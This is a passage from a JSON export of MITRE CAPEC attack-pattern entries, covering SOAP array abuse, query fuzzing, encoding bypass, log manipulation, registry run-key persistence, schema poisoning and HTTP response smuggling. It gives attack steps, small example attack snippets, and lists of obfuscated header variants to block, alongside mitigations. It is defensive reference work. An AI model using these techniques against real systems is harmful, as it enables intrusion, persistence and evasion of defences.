SOAP message to the program, overflowing the buffer."}]},"Prerequisites":{"Prerequisite":"The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array."},"Resources_Required":{"Resource":"The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message."},"Mitigations":{"Mitigation":"If the server either verifies the correctness of the stated array size or if the server stops processing an array once the stated number of elements have been read, regardless of the actual array size, then this attack will fail. The former detects the malformed SOAP message while the latter ensures that the server does not attempt to load more data than was allocated for."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"805"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"35","Entry_Name":"SOAP Array Abuse"}},"References":{"Reference":[{"External_Reference_ID":"REF-102"},{"External_Reference_ID":"REF-103","Section":"5.4.2 Arrays"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"261":{"ID":"261","Name":"Fuzzing for garnering other adjacent user/sensitive data","Abstraction":"Detailed","Status":"Draft","Description":"An adversary who is authorized to send queries to a target sends variants of expected queries in the hope that these modified queries might return information (directly or indirectly through error logs) beyond what the expected set of queries should provide. Many client applications use specific query templates when interacting with a server and often automatically fill in specific fields or attributes. If the server does not verify that the query matches one of the expected templates, an adversary who is allowed to send normal queries could modify their query to try to return additional information. The adversary may not know the names of fields to request or how other modifications will affect the server response, but by attempting multiple plausible variants, they might eventually trigger a server response that divulges sensitive information. Other possible outcomes include server crashes and resource consumption if the unexpected queries cause the server to enter an unstable state or perform excessive computation.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing adversary observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the adversary observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the adversary observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if there are any log or error messages that either provide user/sensitive data or give information about an expected template that could be used to produce this data."},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] If the logs did not reveal any user/sensitive data, an adversary will attempt to make the fuzzing inputs form to an expected template","Technique":["Create variants of expected templates that request additional information","Create variants that exclude limiting clauses","Create variants that alter fields taht identify the requester in order to subvert access controls","Repeat different fuzzing variants until sensitive information is divulged"]}]},"Prerequisites":{"Prerequisite":"The server must assume that the queries it receives follow specific templates and/or have fields or attributes that follow specific procedures. The server must process queries that it receives without adequately checking or sanitizing queries to ensure they follow these templates."},"Resources_Required":{"Resource":"The attacker must have sufficient privileges to send queries to the targeted server. A normal client might limit the nature of these queries, so the attacker must either have a modified client or their own application which allows them to modify the expected queries."},"Example_Instances":{"Example":{"p":"A client that queries an employee database might have templates such that the user only supplies the target\'s name and the template dictates the fields to be returned (location, position in the company, phone number, etc.). If the server does not verify that the query matches one of the expected templates, an attacker who is allowed to send normal queries could modify their query to try to return additional information. For this example, additional information might include social security numbers or salaries."}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"20"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}]}},"263":{"ID":"263","Name":"Force Use of Corrupted Files","Abstraction":"Detailed","Status":"Draft","Description":"This describes an attack where an application is forced to use a file that an attacker has corrupted. The result is often a denial of service caused by the application being unable to process the corrupted file, but other results, including the disabling of filters or access controls (if the application fails in an unsafe way rather than failing by locking down) or buffer overflows are possible.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"17"}},"Prerequisites":{"Prerequisite":["The targeted application must utilize a configuration file that an attacker is able to corrupt. In some cases, the attacker must be able to force the (re-)reading of the corrupted file if the file is normally only consulted at startup.","The severity of the attack hinges on how the application responds to the corrupted file. If the application detects the corruption and locks down, this may result in the denial of services provided by the application. If the application fails to detect the corruption, the result could be a more severe denial of service (crash or hang) or even an exploitable buffer overflow. If the application detects the corruption but fails in an unsafe way, this attack could result in the continuation of services but without certain security structures, such as filters or access controls. For example, if the corrupted file configures filters, an unsafe response from an application could result in simply disabling the filtering mechanisms due to the lack of usable configuration data."]},"Resources_Required":{"Resource":"This varies depending on the resources necessary to corrupt the configuration file and the resources needed to force the application to re-read it (if any)."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}]}},"267":{"ID":"267","Name":"Leverage Alternate Encoding","Abstraction":"Standard","Status":"Draft","Description":"An adversary leverages the possibility to encode potentially harmful input or content used by applications such that the applications are ineffective at validating this encoding standard.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"153"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey the application for user-controllable inputs] Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.","Technique":["Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.","Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.","Use a browser to manually explore the website and analyze how it is constructed. Many browsers\' plugins are available to facilitate the analysis or automate the discovery.","Manually inspect the application to find entry points."]},{"Step":"2","Phase":"Experiment","Description":"[Probe entry points to locate vulnerabilities] The attacker uses the entry points gathered in the \\"Explore\\" phase as a target list and injects various payloads using a variety of different types of encodings to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.","Technique":"Try to use different encodings of content in order to bypass validation routines."}]},"Prerequisites":{"Prerequisite":"The application\'s decoder accepts and interprets encoded characters. Data canonicalization, input filtering and validating is not done properly leaving the door open to harmful characters for the target host."},"Skills_Required":{"Skill":["An attacker can inject different representation of a filtered character in a different encoding.",{"Level":"Low"},"An attacker may craft subtle encoding of input data by using the knowledge that they have gathered about the target host.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Assume all input might use an improper representation. Use canonicalized data inside the application; all data must be converted into the representation used inside the application (UTF-8, UTF-16, etc.)","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input."]},"Example_Instances":{"Example":["Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 does not properly handle unspecified \\"encoding strings,\\" which allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site, aka \\"Post Encoding Information Disclosure Vulnerability.\\" Related Vulnerabilities CVE-2010-0488","Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"73"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"692"}]},"References":{"Reference":[{"External_Reference_ID":"REF-108","Section":"WASC-20 - Improper Input Handling"},{"External_Reference_ID":"REF-109","Section":"Category: Encoding"},{"External_Reference_ID":"REF-110","Section":"Canonicalization, locale and Unicode"},{"External_Reference_ID":"REF-69","Section":"XSS (Cross Site Scripting) Prevention Cheat Sheet"},{"External_Reference_ID":"REF-112","Section":"Chapter 5 Section 9: Character Encoding"},{"External_Reference_ID":"REF-113","Section":"Character encoding"},{"External_Reference_ID":"REF-114"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"268":{"ID":"268","Name":"Audit Log Manipulation","Abstraction":"Standard","Status":"Draft","Description":"The attacker injects, manipulates, deletes, or forges malicious log entries into the log file, in an attempt to mislead an audit of the log file or cover tracks of an attack. Due to either insufficient access controls of the log files or the logging mechanism, the attacker is able to perform such actions.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"161","Exclude_Related":{"Exclude_ID":"512"}}},"Prerequisites":{"Prerequisite":["The target host is logging the action and data of the user.","The target host insufficiently protects access to the logs or logging mechanisms."]},"Resources_Required":{"Resource":{"p":["The attacker must understand how the logging mechanism works.","Optionally, the attacker must know the location and the format of individual entries of the log files."]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"117"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Log Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"270":{"ID":"270","Name":"Modification of Registry Run Keys","Abstraction":"Detailed","Status":"Stable","Description":"An adversary adds a new entry to the \\"run keys\\" in the Windows registry so that an application of their choosing is executed when a user logs in. In this way, the adversary can get their executable to operate and run on the target system with the authorized user\'s level of permissions. This attack is a good way for an adversary to run persistent spyware on a user\'s machine, such as a keylogger.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"203"},{"Nature":"CanPrecede","CAPEC_ID":"568"},{"Nature":"CanPrecede","CAPEC_ID":"529"},{"Nature":"CanPrecede","CAPEC_ID":"646"},{"Nature":"CanFollow","CAPEC_ID":"555"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target system] The adversary must first determine the system they wish to target. This attack only works on Windows."},{"Step":"2","Phase":"Experiment","Description":"[Gain access to the system] The adversary needs to gain access to the system in some way so that they can modify the Windows registry.","Technique":["Gain physical access to a system either through shoulder surfing a password or accessing a system that is left unlocked.","Gain remote access to a system through a variety of means."]},{"Step":"3","Phase":"Exploit","Description":"[Modify Windows registry] The adversary will modify the Windows registry by adding a new entry to the \\"run keys\\" referencing a desired program. This program will be run whenever the user logs in."}]},"Prerequisites":{"Prerequisite":"The adversary must have gained access to the target system via physical or logical means in order to carry out this attack."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Modify Data","Gain Privileges"]}},"Mitigations":{"Mitigation":"Identify programs that may be used to acquire process information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist."},"Example_Instances":{"Example":["An adversary can place a malicious executable (RAT) on the target system and then configure it to automatically run when the user logs in to maintain persistence on the target system.","Through the modification of registry \\"run keys\\" the adversary can masquerade a malicious executable as a legitimate program."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.001","Entry_Name":"Boot or Logon Autostart Execution:Registry Run Keys \u2013 Start Folder"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Mitigations, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Related_Attack_Patterns"}]}},"271":{"ID":"271","Name":"Schema Poisoning","Abstraction":"Standard","Status":"Draft","Description":"An adversary corrupts or modifies the content of a schema for the purpose of undermining the security of the target. Schemas provide the structure and content definitions for resources used by an application. By replacing or modifying a schema, the adversary can affect how the application handles or interprets a resource, often leading to possible denial of service, entering into an unexpected state, or recording incomplete data.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"176","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanFollow","CAPEC_ID":"94"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target application and schema] The adversary first finds the application that they want to target. This application must use schemas in some way, so the adversary also needs to confirm that schemas are being used.","Technique":["Gain access to the system that the application is on and look for a schema.","Observe HTTP traffic to the application and look for a schema being transmitted."]},{"Step":"2","Phase":"Experiment","Description":"[Gain access to schema] The adversary gains access to the schema so that they can modify the contents.","Technique":["For a local scenario, the adversary needs access to the machine that the schema is located on and gain permissions to alter the contents of the schema file.","For a remote scenario, the adversary needs to be able to perform an adversary in the middle attack on the HTTP traffic that contains a schema."]},{"Step":"3","Phase":"Exploit","Description":"[Poison schema] Once the adversary gains access to the schema, they will alter it to achieve a desired effect. Locally, they can just modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.","Technique":["Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing.","Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.","Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B)."]}]},"Prerequisites":{"Prerequisite":["Some level of access to modify the target schema.","The schema used by the target application must be improperly secured against unauthorized modification and manipulation."]},"Resources_Required":{"Resource":"Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema."},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful schema poisoning attack can compromise the availability of the target system\'s service by exhausting its available resources."},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Design: Protect the schema against unauthorized modification.","Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the schema document.","Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification."]},"Example_Instances":{"Example":[{"p":["In a JSON Schema Poisoning Attack, an adervary modifies the JSON schema to cause a Denial of Service (DOS) or to submit malicious input:","If the \'name\' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur."],"div":["{ \\"title\\": \\"Contact\\", \\"type\\": \\"object\\", \\"properties\\": { \\"Name\\": { \\"type\\": \\"string\\" }, \\"Phone\\": { \\"type\\": \\"string\\" }, \\"Email\\": { \\"type\\": \\"string\\" }, \\"Address\\": { \\"type\\": \\"string\\" } }, \\"required\\": [\\"Name\\", \\"Phone\\", \\"Email\\", \\"Address\\"] }",{"style":"margin-left:10px;","class":"attack"}]},{"p":["In a Database Schema Poisoning Attack, an adversary alters the database schema being used to modify the database in some way. This can result in loss of data, DOS, or malicious input being submitted. Assuming there is a column named \\"name\\", an adversary could make the following schema change:","The \\"Name\\" field of the \\"Conteacts\\" table now allows the storing of names up to 65353 characters in length. This could allow the adversary to store excess data within the database to consume system resource or to execute a DOS."],"div":["ALTER TABLE Contacts MODIFY Name VARCHAR(65353);",{"style":"margin-left:10px;","class":"attack"}]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"15"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description, Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"}]}},"272":{"ID":"272","Name":"Protocol Manipulation","Abstraction":"Meta","Status":"Draft","Description":"An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The protocol or implementations thereof must contain bugs that an adversary can exploit."},"Resources_Required":{"Resource":"In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"273":{"ID":"273","Name":"HTTP Response Smuggling","Abstraction":"Detailed","Status":"Stable","Description":{"p":["An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server).","See CanPrecede relationships for possible consequences."]},"Extended_Description":{"p":["In the maliciously manipulated HTTP response, an adversary can add duplicate header fields that HTTP agents interpret as belonging to separate responses.","The combined HTTP response ends up being parsed or interpreted as two or more HTTP responses by the targeted client HTTP agent. This allows malicious HTTP responses to bypass security controls. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.","This attack usually involves the misuse of the HTTP headers: Content-Length and Transfer-Encoding. These abuses are discussed in RFC 2616 #4.4.3 and section #4.2 and are related to ordering and precedence of these headers. [REF-38]","This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.","This differs from CAPEC-33 HTTP Request Smuggling, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Smuggling is an attempt to compromise a",{"em":"client agent (e.g., web browser)"},"HTTP Splitting (CAPEC-105 and CAPEC-34) is different from HTTP Smuggling due to the fact that during implementation of asynchronous requests, HTTP Splitting requires the embedding/injection of arbitrary HTML headers and content through user input into browser cookies or Ajax web/browser object parameters like XMLHttpRequest."]},"Alternate_Terms":{"Alternate_Term":{"Term":"HTTP Desync","Description":"Modification/manipulation of HTTP message headers and body parameters to disrupt and interfere in the interpretation and parsing of HTTP message lengths/boundaries for consecutive HTTP messages by HTTP agents in a HTTP chain or network path."}},"Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"220"},{"Nature":"PeerOf","CAPEC_ID":"33"},{"Nature":"CanPrecede","CAPEC_ID":"115"},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"CanPrecede","CAPEC_ID":"63"},{"Nature":"CanPrecede","CAPEC_ID":"593"},{"Nature":"CanPrecede","CAPEC_ID":"148"},{"Nature":"CanPrecede","CAPEC_ID":"154"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey network to identify target] The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.","Technique":"Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer."},{"Step":"1","Phase":"Experiment","Description":"[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure to intended targets in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers."},{"Step":"2","Phase":"Experiment","Description":"[Cause differential HTTP responses by experimenting with identified HTTP Response vulnerabilities] The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP response. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses will be observed to confirm applicability of identified vulnerabilities in the adversary\'s plan of attack.","Technique":["Continue the monitoring of HTTP traffic.",{"p":["Inject additional HTTP headers to utilize various combinations of HTTP Headers within a single HTTP message such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded message or data in the body of the original message are unprocessed and treated as part of subsequent messages by the intended target HTTP agent.","From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences."],"ul":{"li":["For CL;TE and TE;CL HTTP headers combination, the first HTTP agent, in the HTTP message path that receives the HTTP message, takes precedence or only processes the one header but not the other, while the second/final HTTP agent processes the opposite header allowing for embedded HTTP message to be ignored and smuggled to the intended target HTTP agent.","For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP messages to be smuggled. See Mitigations for details."]}},{"p":["Construct a very large HTTP message via multiple Content-Length headers of various data lengths that can potentially cause subsequent messages to be ignored by an intermediary HTTP agent (e.g., firewall) and/or eventually parsed separately by the target HTTP agent.","Note that most modern HTTP infrastructure reject HTTP messages with multiple Content-Length headers."]},"Monitor HTTP traffic using a tool such as a Network Protocol Analyzer."]},{"Step":"1","Phase":"Exploit","Description":"[Perform HTTP Response Smuggling attack] Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.","Technique":"Leverage techniques identified in the Experiment Phase."}]},"Prerequisites":{"Prerequisite":["A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server\'s response to target HTTP agents (e.g., proxies and users\' web browsers).","Differences in the way the two HTTP agents parse and interpret HTTP responses and its headers.","HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses."]},"Skills_Required":{"Skill":["Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.",{"Level":"Medium"},"Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.",{"Level":"Medium"},"Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages."},"Indicators":{"Indicator":"Differences in responses processed by the two agents. This requires careful monitoring or a capable log analysis tool."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.","Configuration: front-end HTTP agents notice ambiguous requests.","Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.","Configuration: Disable reuse of back-end connections.","Configuration: Use HTTP/2 for back-end connections.","Configuration: Use the same web server software for front-end and back-end server.","Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.","Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.","Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.","Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:",{"ul":{"li":["Headers with no space before the value \u201cchunked\u201d","Headers with extra spaces","Headers beginning with trailing characters","Headers providing a value \u201cchunk\u201d instead of \u201cchunked\u201d (the server normalizes this as chunked encoding)","Headers with multiple spaces before the value \u201cchunked\u201d","Headers with quoted values (whether single or double quotations)","Headers with CRLF characters before the value \u201cchunked\u201d","Values with invalid characters"]}},"Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)","Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.","Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input."]},"Example_Instances":{"Example":[{"p":"When using Undertow, a Java-based web server in Red Hat\'s Jboss Enterprise Application Platform version 7.0, the code responsible for parsing HTTP requests permitted invalid 